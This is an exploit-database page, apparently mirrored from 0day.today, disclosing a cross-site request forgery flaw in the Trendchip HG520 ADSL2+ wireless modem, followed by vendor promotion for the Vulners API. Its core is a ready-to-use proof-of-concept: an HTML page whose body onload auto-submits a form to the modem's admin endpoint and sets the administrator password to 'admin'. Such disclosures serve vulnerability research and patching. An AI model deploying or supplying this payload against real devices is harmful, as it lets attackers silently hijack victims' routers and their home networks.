Lucene search
K

Trendchip HG520 ADSL2+ Wireless Modem CSRF Vulnerability

🗓️ 17 Feb 2014 00:00:00Reported by Dhruv ShahType 
zdt
 zdt
🔗 0day.today👁 46 Views

Trendchip HG520 ADSL2+ Wireless Modem CSRF vulnerability allows attackers to manipulate user data and change password

Code
Cross Site Request Forgery
 
 
 
This Modem's Web Application , suffers from Cross-site request forgery
through which attacker can manipulate user data via sending him malicious
craft url.
 
 
 
The Modems's Application  not using any security token to prevent it
against CSRF. You can manipulate any userdata. PoC and Exploit to change
user password:
 
 In the POC the IP address in the POST is the modems IP address.
 
<html>
 
<body onload="javascript:document.forms[0].submit()">
 
<form method="POST" action="http://192.168.2.1/Forms/tools_admin_1"
name="tool_admin">
 
<input name="uiViewTools_Password" size="30" maxlength="30" value="admin"
type="PASSWORD">
 
<input name="uiViewTools_PasswordConfirm" size="30" maxlength="30"
value="admin" type="PASSWORD">
 
</form>
 
</body>
 
</html>

#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation